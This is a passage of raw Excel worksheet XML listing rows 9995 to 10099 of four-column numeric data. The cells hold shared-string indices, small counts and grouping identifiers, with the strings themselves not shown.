      <c r="A9995" t="s">
        <v>16231</v>
      </c>
      <c r="B9995" t="s">
        <v>16214</v>
      </c>
      <c r="C9995">
        <v>0</v>
      </c>
      <c r="D9995">
        <v>4786</v>
      </c>
    </row>
    <row r="9996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9996" t="s">
        <v>16228</v>
      </c>
      <c r="B9996" t="s">
        <v>16215</v>
      </c>
      <c r="C9996">
        <v>1</v>
      </c>
      <c r="D9996">
        <v>4786</v>
      </c>
    </row>
    <row r="9997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9997" t="s">
        <v>16231</v>
      </c>
      <c r="B9997" t="s">
        <v>16216</v>
      </c>
      <c r="C9997">
        <v>1</v>
      </c>
      <c r="D9997">
        <v>4786</v>
      </c>
    </row>
    <row r="9998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9998" t="s">
        <v>16228</v>
      </c>
      <c r="B9998" t="s">
        <v>16217</v>
      </c>
      <c r="C9998">
        <v>1</v>
      </c>
      <c r="D9998">
        <v>4786</v>
      </c>
    </row>
    <row r="9999" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9999" t="s">
        <v>16231</v>
      </c>
      <c r="B9999" t="s">
        <v>16218</v>
      </c>
      <c r="C9999">
        <v>2</v>
      </c>
      <c r="D9999">
        <v>4786</v>
      </c>
    </row>
    <row r="10000" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10000" t="s">
        <v>16229</v>
      </c>
      <c r="B10000" t="s">
        <v>16219</v>
      </c>
      <c r="C10000">
        <v>0</v>
      </c>
      <c r="D10000">
        <v>4786</v>
      </c>
    </row>
    <row r="10001" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10001" t="s">
        <v>16230</v>
      </c>
      <c r="B10001" t="s">
        <v>16220</v>
      </c>
      <c r="C10001">
        <v>0</v>
      </c>
      <c r="D10001">
        <v>4786</v>
      </c>
    </row>
    <row r="10002" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10002" t="s">
        <v>16229</v>
      </c>
      <c r="B10002" t="s">
        <v>16221</v>
      </c>
      <c r="C10002">
        <v>0</v>
      </c>
      <c r="D10002">
        <v>4786</v>
      </c>
    </row>
    <row r="10003" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10003" t="s">
        <v>16230</v>
      </c>
      <c r="B10003" t="s">
        <v>16222</v>
      </c>
      <c r="C10003">
        <v>0</v>
      </c>
      <c r="D10003">
        <v>4786</v>
      </c>
    </row>
    <row r="10004" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10004" t="s">
        <v>16223</v>
      </c>
      <c r="B10004" t="s">
        <v>16223</v>
      </c>
      <c r="C10004">
        <v>6</v>
      </c>
      <c r="D10004">
        <v>4786</v>
      </c>
    </row>
    <row r="10005" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10005" t="s">
        <v>16224</v>
      </c>
      <c r="B10005" t="s">
        <v>16224</v>
      </c>
      <c r="C10005">
        <v>0</v>
      </c>
      <c r="D10005">
        <v>4786</v>
      </c>
    </row>
    <row r="10006" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10006" t="s">
        <v>16228</v>
      </c>
      <c r="B10006" t="s">
        <v>16211</v>
      </c>
      <c r="C10006">
        <v>1</v>
      </c>
      <c r="D10006">
        <v>4885</v>
      </c>
    </row>
    <row r="10007" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10007" t="s">
        <v>16231</v>
      </c>
      <c r="B10007" t="s">
        <v>16212</v>
      </c>
      <c r="C10007">
        <v>0</v>
      </c>
      <c r="D10007">
        <v>4885</v>
      </c>
    </row>
    <row r="10008" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10008" t="s">
        <v>16228</v>
      </c>
      <c r="B10008" t="s">
        <v>16213</v>
      </c>
      <c r="C10008">
        <v>4</v>
      </c>
      <c r="D10008">
        <v>4885</v>
      </c>
    </row>
    <row r="10009" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10009" t="s">
        <v>16231</v>
      </c>
      <c r="B10009" t="s">
        <v>16214</v>
      </c>
      <c r="C10009">
        <v>0</v>
      </c>
      <c r="D10009">
        <v>4885</v>
      </c>
    </row>
    <row r="10010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10010" t="s">
        <v>16228</v>
      </c>
      <c r="B10010" t="s">
        <v>16215</v>
      </c>
      <c r="C10010">
        <v>1</v>
      </c>
      <c r="D10010">
        <v>4885</v>
      </c>
    </row>
    <row r="10011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10011" t="s">
        <v>16231</v>
      </c>
      <c r="B10011" t="s">
        <v>16216</v>
      </c>
      <c r="C10011">
        <v>0</v>
      </c>
      <c r="D10011">
        <v>4885</v>
      </c>
    </row>
    <row r="10012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10012" t="s">
        <v>16228</v>
      </c>
      <c r="B10012" t="s">
        <v>16217</v>
      </c>
      <c r="C10012">
        <v>4</v>
      </c>
      <c r="D10012">
        <v>4885</v>
      </c>
    </row>
    <row r="10013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10013" t="s">
        <v>16231</v>
      </c>
      <c r="B10013" t="s">
        <v>16218</v>
      </c>
      <c r="C10013">
        <v>0</v>
      </c>
      <c r="D10013">
        <v>4885</v>
      </c>
    </row>
    <row r="10014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10014" t="s">
        <v>16229</v>
      </c>
      <c r="B10014" t="s">
        <v>16219</v>
      </c>
      <c r="C10014">
        <v>0</v>
      </c>
      <c r="D10014">
        <v>4885</v>
      </c>
    </row>
    <row r="10015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10015" t="s">
        <v>16230</v>
      </c>
      <c r="B10015" t="s">
        <v>16220</v>
      </c>
      <c r="C10015">
        <v>0</v>
      </c>
      <c r="D10015">
        <v>4885</v>
      </c>
    </row>
    <row r="10016" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10016" t="s">
        <v>16229</v>
      </c>
      <c r="B10016" t="s">
        <v>16221</v>
      </c>
      <c r="C10016">
        <v>0</v>
      </c>
      <c r="D10016">
        <v>4885</v>
      </c>
    </row>
    <row r="10017" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10017" t="s">
        <v>16230</v>
      </c>
      <c r="B10017" t="s">
        <v>16222</v>
      </c>
      <c r="C10017">
        <v>0</v>
      </c>
      <c r="D10017">
        <v>4885</v>
      </c>
    </row>
    <row r="10018" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10018" t="s">
        <v>16223</v>
      </c>
      <c r="B10018" t="s">
        <v>16223</v>
      </c>
      <c r="C10018">
        <v>22</v>
      </c>
      <c r="D10018">
        <v>4885</v>
      </c>
    </row>
    <row r="10019" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10019" t="s">
        <v>16224</v>
      </c>
      <c r="B10019" t="s">
        <v>16224</v>
      </c>
      <c r="C10019">
        <v>1</v>
      </c>
      <c r="D10019">
        <v>4885</v>
      </c>
    </row>
    <row r="10020" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10020" t="s">
        <v>16228</v>
      </c>
      <c r="B10020" t="s">
        <v>16211</v>
      </c>
      <c r="C10020">
        <v>0</v>
      </c>
      <c r="D10020">
        <v>1401</v>
      </c>
    </row>
    <row r="10021" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10021" t="s">
        <v>16231</v>
      </c>
      <c r="B10021" t="s">
        <v>16212</v>
      </c>
      <c r="C10021">
        <v>0</v>
      </c>
      <c r="D10021">
        <v>1401</v>
      </c>
    </row>
    <row r="10022" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10022" t="s">
        <v>16228</v>
      </c>
      <c r="B10022" t="s">
        <v>16213</v>
      </c>
      <c r="C10022">
        <v>0</v>
      </c>
      <c r="D10022">
        <v>1401</v>
      </c>
    </row>
    <row r="10023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10023" t="s">
        <v>16231</v>
      </c>
      <c r="B10023" t="s">
        <v>16214</v>
      </c>
      <c r="C10023">
        <v>0</v>
      </c>
      <c r="D10023">
        <v>1401</v>
      </c>
    </row>
    <row r="10024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10024" t="s">
        <v>16228</v>
      </c>
      <c r="B10024" t="s">
        <v>16215</v>
      </c>
      <c r="C10024">
        <v>2</v>
      </c>
      <c r="D10024">
        <v>1401</v>
      </c>
    </row>
    <row r="10025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10025" t="s">
        <v>16231</v>
      </c>
      <c r="B10025" t="s">
        <v>16216</v>
      </c>
      <c r="C10025">
        <v>1</v>
      </c>
      <c r="D10025">
        <v>1401</v>
      </c>
    </row>
    <row r="10026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10026" t="s">
        <v>16228</v>
      </c>
      <c r="B10026" t="s">
        <v>16217</v>
      </c>
      <c r="C10026">
        <v>3</v>
      </c>
      <c r="D10026">
        <v>1401</v>
      </c>
    </row>
    <row r="10027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10027" t="s">
        <v>16231</v>
      </c>
      <c r="B10027" t="s">
        <v>16218</v>
      </c>
      <c r="C10027">
        <v>2</v>
      </c>
      <c r="D10027">
        <v>1401</v>
      </c>
    </row>
    <row r="10028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10028" t="s">
        <v>16229</v>
      </c>
      <c r="B10028" t="s">
        <v>16219</v>
      </c>
      <c r="C10028">
        <v>0</v>
      </c>
      <c r="D10028">
        <v>1401</v>
      </c>
    </row>
    <row r="10029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10029" t="s">
        <v>16230</v>
      </c>
      <c r="B10029" t="s">
        <v>16220</v>
      </c>
      <c r="C10029">
        <v>0</v>
      </c>
      <c r="D10029">
        <v>1401</v>
      </c>
    </row>
    <row r="10030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10030" t="s">
        <v>16229</v>
      </c>
      <c r="B10030" t="s">
        <v>16221</v>
      </c>
      <c r="C10030">
        <v>10</v>
      </c>
      <c r="D10030">
        <v>1401</v>
      </c>
    </row>
    <row r="10031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10031" t="s">
        <v>16230</v>
      </c>
      <c r="B10031" t="s">
        <v>16222</v>
      </c>
      <c r="C10031">
        <v>10</v>
      </c>
      <c r="D10031">
        <v>1401</v>
      </c>
    </row>
    <row r="10032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10032" t="s">
        <v>16223</v>
      </c>
      <c r="B10032" t="s">
        <v>16223</v>
      </c>
      <c r="C10032">
        <v>22</v>
      </c>
      <c r="D10032">
        <v>1401</v>
      </c>
    </row>
    <row r="10033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10033" t="s">
        <v>16224</v>
      </c>
      <c r="B10033" t="s">
        <v>16224</v>
      </c>
      <c r="C10033">
        <v>2</v>
      </c>
      <c r="D10033">
        <v>1401</v>
      </c>
    </row>
    <row r="10034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10034" t="s">
        <v>16228</v>
      </c>
      <c r="B10034" t="s">
        <v>16211</v>
      </c>
      <c r="C10034">
        <v>0</v>
      </c>
      <c r="D10034">
        <v>4780</v>
      </c>
    </row>
    <row r="10035" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10035" t="s">
        <v>16231</v>
      </c>
      <c r="B10035" t="s">
        <v>16212</v>
      </c>
      <c r="C10035">
        <v>0</v>
      </c>
      <c r="D10035">
        <v>4780</v>
      </c>
    </row>
    <row r="10036" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10036" t="s">
        <v>16228</v>
      </c>
      <c r="B10036" t="s">
        <v>16213</v>
      </c>
      <c r="C10036">
        <v>0</v>
      </c>
      <c r="D10036">
        <v>4780</v>
      </c>
    </row>
    <row r="10037" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10037" t="s">
        <v>16231</v>
      </c>
      <c r="B10037" t="s">
        <v>16214</v>
      </c>
      <c r="C10037">
        <v>0</v>
      </c>
      <c r="D10037">
        <v>4780</v>
      </c>
    </row>
    <row r="10038" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10038" t="s">
        <v>16228</v>
      </c>
      <c r="B10038" t="s">
        <v>16215</v>
      </c>
      <c r="C10038">
        <v>0</v>
      </c>
      <c r="D10038">
        <v>4780</v>
      </c>
    </row>
    <row r="10039" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10039" t="s">
        <v>16231</v>
      </c>
      <c r="B10039" t="s">
        <v>16216</v>
      </c>
      <c r="C10039">
        <v>1</v>
      </c>
      <c r="D10039">
        <v>4780</v>
      </c>
    </row>
    <row r="10040" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10040" t="s">
        <v>16228</v>
      </c>
      <c r="B10040" t="s">
        <v>16217</v>
      </c>
      <c r="C10040">
        <v>1</v>
      </c>
      <c r="D10040">
        <v>4780</v>
      </c>
    </row>
    <row r="10041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10041" t="s">
        <v>16231</v>
      </c>
      <c r="B10041" t="s">
        <v>16218</v>
      </c>
      <c r="C10041">
        <v>1</v>
      </c>
      <c r="D10041">
        <v>4780</v>
      </c>
    </row>
    <row r="10042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10042" t="s">
        <v>16229</v>
      </c>
      <c r="B10042" t="s">
        <v>16219</v>
      </c>
      <c r="C10042">
        <v>0</v>
      </c>
      <c r="D10042">
        <v>4780</v>
      </c>
    </row>
    <row r="10043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10043" t="s">
        <v>16230</v>
      </c>
      <c r="B10043" t="s">
        <v>16220</v>
      </c>
      <c r="C10043">
        <v>0</v>
      </c>
      <c r="D10043">
        <v>4780</v>
      </c>
    </row>
    <row r="10044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10044" t="s">
        <v>16229</v>
      </c>
      <c r="B10044" t="s">
        <v>16221</v>
      </c>
      <c r="C10044">
        <v>0</v>
      </c>
      <c r="D10044">
        <v>4780</v>
      </c>
    </row>
    <row r="10045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10045" t="s">
        <v>16230</v>
      </c>
      <c r="B10045" t="s">
        <v>16222</v>
      </c>
      <c r="C10045">
        <v>2</v>
      </c>
      <c r="D10045">
        <v>4780</v>
      </c>
    </row>
    <row r="10046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10046" t="s">
        <v>16223</v>
      </c>
      <c r="B10046" t="s">
        <v>16223</v>
      </c>
      <c r="C10046">
        <v>26</v>
      </c>
      <c r="D10046">
        <v>4780</v>
      </c>
    </row>
    <row r="10047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10047" t="s">
        <v>16224</v>
      </c>
      <c r="B10047" t="s">
        <v>16224</v>
      </c>
      <c r="C10047">
        <v>0</v>
      </c>
      <c r="D10047">
        <v>4780</v>
      </c>
    </row>
    <row r="10048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10048" t="s">
        <v>16223</v>
      </c>
      <c r="B10048" t="s">
        <v>16223</v>
      </c>
      <c r="C10048">
        <v>25</v>
      </c>
      <c r="D10048">
        <v>4780</v>
      </c>
    </row>
    <row r="10049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10049" t="s">
        <v>16228</v>
      </c>
      <c r="B10049" t="s">
        <v>16211</v>
      </c>
      <c r="C10049">
        <v>0</v>
      </c>
      <c r="D10049">
        <v>4826</v>
      </c>
    </row>
    <row r="10050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10050" t="s">
        <v>16231</v>
      </c>
      <c r="B10050" t="s">
        <v>16212</v>
      </c>
      <c r="C10050">
        <v>0</v>
      </c>
      <c r="D10050">
        <v>4826</v>
      </c>
    </row>
    <row r="10051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10051" t="s">
        <v>16228</v>
      </c>
      <c r="B10051" t="s">
        <v>16213</v>
      </c>
      <c r="C10051">
        <v>1</v>
      </c>
      <c r="D10051">
        <v>4826</v>
      </c>
    </row>
    <row r="10052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10052" t="s">
        <v>16231</v>
      </c>
      <c r="B10052" t="s">
        <v>16214</v>
      </c>
      <c r="C10052">
        <v>1</v>
      </c>
      <c r="D10052">
        <v>4826</v>
      </c>
    </row>
    <row r="10053" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10053" t="s">
        <v>16228</v>
      </c>
      <c r="B10053" t="s">
        <v>16215</v>
      </c>
      <c r="C10053">
        <v>2</v>
      </c>
      <c r="D10053">
        <v>4826</v>
      </c>
    </row>
    <row r="10054" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10054" t="s">
        <v>16231</v>
      </c>
      <c r="B10054" t="s">
        <v>16216</v>
      </c>
      <c r="C10054">
        <v>8</v>
      </c>
      <c r="D10054">
        <v>4826</v>
      </c>
    </row>
    <row r="10055" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10055" t="s">
        <v>16228</v>
      </c>
      <c r="B10055" t="s">
        <v>16217</v>
      </c>
      <c r="C10055">
        <v>0</v>
      </c>
      <c r="D10055">
        <v>4826</v>
      </c>
    </row>
    <row r="10056" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10056" t="s">
        <v>16231</v>
      </c>
      <c r="B10056" t="s">
        <v>16218</v>
      </c>
      <c r="C10056">
        <v>0</v>
      </c>
      <c r="D10056">
        <v>4826</v>
      </c>
    </row>
    <row r="10057" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10057" t="s">
        <v>16229</v>
      </c>
      <c r="B10057" t="s">
        <v>16219</v>
      </c>
      <c r="C10057">
        <v>0</v>
      </c>
      <c r="D10057">
        <v>4826</v>
      </c>
    </row>
    <row r="10058" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10058" t="s">
        <v>16230</v>
      </c>
      <c r="B10058" t="s">
        <v>16220</v>
      </c>
      <c r="C10058">
        <v>0</v>
      </c>
      <c r="D10058">
        <v>4826</v>
      </c>
    </row>
    <row r="10059" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10059" t="s">
        <v>16229</v>
      </c>
      <c r="B10059" t="s">
        <v>16221</v>
      </c>
      <c r="C10059">
        <v>0</v>
      </c>
      <c r="D10059">
        <v>4826</v>
      </c>
    </row>
    <row r="10060" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10060" t="s">
        <v>16230</v>
      </c>
      <c r="B10060" t="s">
        <v>16222</v>
      </c>
      <c r="C10060">
        <v>0</v>
      </c>
      <c r="D10060">
        <v>4826</v>
      </c>
    </row>
    <row r="10061" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10061" t="s">
        <v>16223</v>
      </c>
      <c r="B10061" t="s">
        <v>16223</v>
      </c>
      <c r="C10061">
        <v>0</v>
      </c>
      <c r="D10061">
        <v>4826</v>
      </c>
    </row>
    <row r="10062" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10062" t="s">
        <v>16224</v>
      </c>
      <c r="B10062" t="s">
        <v>16224</v>
      </c>
      <c r="C10062">
        <v>0</v>
      </c>
      <c r="D10062">
        <v>4826</v>
      </c>
    </row>
    <row r="10063" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10063" t="s">
        <v>16228</v>
      </c>
      <c r="B10063" t="s">
        <v>16211</v>
      </c>
      <c r="C10063">
        <v>0</v>
      </c>
      <c r="D10063">
        <v>1235</v>
      </c>
    </row>
    <row r="10064" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10064" t="s">
        <v>16231</v>
      </c>
      <c r="B10064" t="s">
        <v>16212</v>
      </c>
      <c r="C10064">
        <v>0</v>
      </c>
      <c r="D10064">
        <v>1235</v>
      </c>
    </row>
    <row r="10065" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10065" t="s">
        <v>16228</v>
      </c>
      <c r="B10065" t="s">
        <v>16213</v>
      </c>
      <c r="C10065">
        <v>0</v>
      </c>
      <c r="D10065">
        <v>1235</v>
      </c>
    </row>
    <row r="10066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10066" t="s">
        <v>16231</v>
      </c>
      <c r="B10066" t="s">
        <v>16214</v>
      </c>
      <c r="C10066">
        <v>0</v>
      </c>
      <c r="D10066">
        <v>1235</v>
      </c>
    </row>
    <row r="10067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10067" t="s">
        <v>16228</v>
      </c>
      <c r="B10067" t="s">
        <v>16215</v>
      </c>
      <c r="C10067">
        <v>2</v>
      </c>
      <c r="D10067">
        <v>1235</v>
      </c>
    </row>
    <row r="10068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10068" t="s">
        <v>16231</v>
      </c>
      <c r="B10068" t="s">
        <v>16216</v>
      </c>
      <c r="C10068">
        <v>2</v>
      </c>
      <c r="D10068">
        <v>1235</v>
      </c>
    </row>
    <row r="10069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10069" t="s">
        <v>16228</v>
      </c>
      <c r="B10069" t="s">
        <v>16217</v>
      </c>
      <c r="C10069">
        <v>2</v>
      </c>
      <c r="D10069">
        <v>1235</v>
      </c>
    </row>
    <row r="10070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10070" t="s">
        <v>16231</v>
      </c>
      <c r="B10070" t="s">
        <v>16218</v>
      </c>
      <c r="C10070">
        <v>2</v>
      </c>
      <c r="D10070">
        <v>1235</v>
      </c>
    </row>
    <row r="10071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10071" t="s">
        <v>16229</v>
      </c>
      <c r="B10071" t="s">
        <v>16219</v>
      </c>
      <c r="C10071">
        <v>15</v>
      </c>
      <c r="D10071">
        <v>1235</v>
      </c>
    </row>
    <row r="10072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10072" t="s">
        <v>16230</v>
      </c>
      <c r="B10072" t="s">
        <v>16220</v>
      </c>
      <c r="C10072">
        <v>0</v>
      </c>
      <c r="D10072">
        <v>1235</v>
      </c>
    </row>
    <row r="10073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10073" t="s">
        <v>16229</v>
      </c>
      <c r="B10073" t="s">
        <v>16221</v>
      </c>
      <c r="C10073">
        <v>0</v>
      </c>
      <c r="D10073">
        <v>1235</v>
      </c>
    </row>
    <row r="10074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10074" t="s">
        <v>16230</v>
      </c>
      <c r="B10074" t="s">
        <v>16222</v>
      </c>
      <c r="C10074">
        <v>0</v>
      </c>
      <c r="D10074">
        <v>1235</v>
      </c>
    </row>
    <row r="10075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10075" t="s">
        <v>16223</v>
      </c>
      <c r="B10075" t="s">
        <v>16223</v>
      </c>
      <c r="C10075">
        <v>0</v>
      </c>
      <c r="D10075">
        <v>1235</v>
      </c>
    </row>
    <row r="10076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10076" t="s">
        <v>16224</v>
      </c>
      <c r="B10076" t="s">
        <v>16224</v>
      </c>
      <c r="C10076">
        <v>1</v>
      </c>
      <c r="D10076">
        <v>1235</v>
      </c>
    </row>
    <row r="10077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10077" t="s">
        <v>16228</v>
      </c>
      <c r="B10077" t="s">
        <v>16211</v>
      </c>
      <c r="C10077">
        <v>0</v>
      </c>
      <c r="D10077">
        <v>174</v>
      </c>
    </row>
    <row r="10078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10078" t="s">
        <v>16231</v>
      </c>
      <c r="B10078" t="s">
        <v>16212</v>
      </c>
      <c r="C10078">
        <v>0</v>
      </c>
      <c r="D10078">
        <v>174</v>
      </c>
    </row>
    <row r="10079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10079" t="s">
        <v>16228</v>
      </c>
      <c r="B10079" t="s">
        <v>16213</v>
      </c>
      <c r="C10079">
        <v>0</v>
      </c>
      <c r="D10079">
        <v>174</v>
      </c>
    </row>
    <row r="10080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10080" t="s">
        <v>16231</v>
      </c>
      <c r="B10080" t="s">
        <v>16214</v>
      </c>
      <c r="C10080">
        <v>0</v>
      </c>
      <c r="D10080">
        <v>174</v>
      </c>
    </row>
    <row r="10081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10081" t="s">
        <v>16228</v>
      </c>
      <c r="B10081" t="s">
        <v>16215</v>
      </c>
      <c r="C10081">
        <v>0</v>
      </c>
      <c r="D10081">
        <v>174</v>
      </c>
    </row>
    <row r="10082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10082" t="s">
        <v>16231</v>
      </c>
      <c r="B10082" t="s">
        <v>16216</v>
      </c>
      <c r="C10082">
        <v>2</v>
      </c>
      <c r="D10082">
        <v>174</v>
      </c>
    </row>
    <row r="10083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10083" t="s">
        <v>16228</v>
      </c>
      <c r="B10083" t="s">
        <v>16217</v>
      </c>
      <c r="C10083">
        <v>10</v>
      </c>
      <c r="D10083">
        <v>174</v>
      </c>
    </row>
    <row r="10084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10084" t="s">
        <v>16231</v>
      </c>
      <c r="B10084" t="s">
        <v>16218</v>
      </c>
      <c r="C10084">
        <v>20</v>
      </c>
      <c r="D10084">
        <v>174</v>
      </c>
    </row>
    <row r="10085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10085" t="s">
        <v>16229</v>
      </c>
      <c r="B10085" t="s">
        <v>16219</v>
      </c>
      <c r="C10085">
        <v>0</v>
      </c>
      <c r="D10085">
        <v>174</v>
      </c>
    </row>
    <row r="10086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10086" t="s">
        <v>16230</v>
      </c>
      <c r="B10086" t="s">
        <v>16220</v>
      </c>
      <c r="C10086">
        <v>2</v>
      </c>
      <c r="D10086">
        <v>174</v>
      </c>
    </row>
    <row r="10087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10087" t="s">
        <v>16229</v>
      </c>
      <c r="B10087" t="s">
        <v>16221</v>
      </c>
      <c r="C10087">
        <v>19</v>
      </c>
      <c r="D10087">
        <v>174</v>
      </c>
    </row>
    <row r="10088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10088" t="s">
        <v>16230</v>
      </c>
      <c r="B10088" t="s">
        <v>16222</v>
      </c>
      <c r="C10088">
        <v>28</v>
      </c>
      <c r="D10088">
        <v>174</v>
      </c>
    </row>
    <row r="10089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10089" t="s">
        <v>16223</v>
      </c>
      <c r="B10089" t="s">
        <v>16223</v>
      </c>
      <c r="C10089">
        <v>6</v>
      </c>
      <c r="D10089">
        <v>174</v>
      </c>
    </row>
    <row r="10090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10090" t="s">
        <v>16224</v>
      </c>
      <c r="B10090" t="s">
        <v>16224</v>
      </c>
      <c r="C10090">
        <v>1</v>
      </c>
      <c r="D10090">
        <v>174</v>
      </c>
    </row>
    <row r="10091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10091" t="s">
        <v>16228</v>
      </c>
      <c r="B10091" t="s">
        <v>16211</v>
      </c>
      <c r="C10091">
        <v>0</v>
      </c>
      <c r="D10091">
        <v>1960</v>
      </c>
    </row>
    <row r="10092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10092" t="s">
        <v>16231</v>
      </c>
      <c r="B10092" t="s">
        <v>16212</v>
      </c>
      <c r="C10092">
        <v>0</v>
      </c>
      <c r="D10092">
        <v>1960</v>
      </c>
    </row>
    <row r="10093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10093" t="s">
        <v>16228</v>
      </c>
      <c r="B10093" t="s">
        <v>16213</v>
      </c>
      <c r="C10093">
        <v>0</v>
      </c>
      <c r="D10093">
        <v>1960</v>
      </c>
    </row>
    <row r="10094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10094" t="s">
        <v>16231</v>
      </c>
      <c r="B10094" t="s">
        <v>16214</v>
      </c>
      <c r="C10094">
        <v>0</v>
      </c>
      <c r="D10094">
        <v>1960</v>
      </c>
    </row>
    <row r="10095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10095" t="s">
        <v>16228</v>
      </c>
      <c r="B10095" t="s">
        <v>16215</v>
      </c>
      <c r="C10095">
        <v>0</v>
      </c>
      <c r="D10095">
        <v>1960</v>
      </c>
    </row>
    <row r="10096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10096" t="s">
        <v>16231</v>
      </c>
      <c r="B10096" t="s">
        <v>16216</v>
      </c>
      <c r="C10096">
        <v>2</v>
      </c>
      <c r="D10096">
        <v>1960</v>
      </c>
    </row>
    <row r="10097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10097" t="s">
        <v>16228</v>
      </c>
      <c r="B10097" t="s">
        <v>16217</v>
      </c>
      <c r="C10097">
        <v>3</v>
      </c>
      <c r="D10097">
        <v>1960</v>
      </c>
    </row>
    <row r="10098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10098" t="s">
        <v>16231</v>
      </c>
      <c r="B10098" t="s">
        <v>16218</v>
      </c>
      <c r="C10098">
        <v>3</v>
      </c>
      <c r="D10098">
        <v>1960</v>
      </c>
    </row>
    <row r="10099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10099" t="s">
        <v>16229</v>
      </c>
      <c r="B10099" t="s">
        <v>16219</v>
      </c>
      <c r="C10099">
        <v>0</v>
      </c>
      <c r="D10099">
        <v>1960</v>
      </c>
    </row>
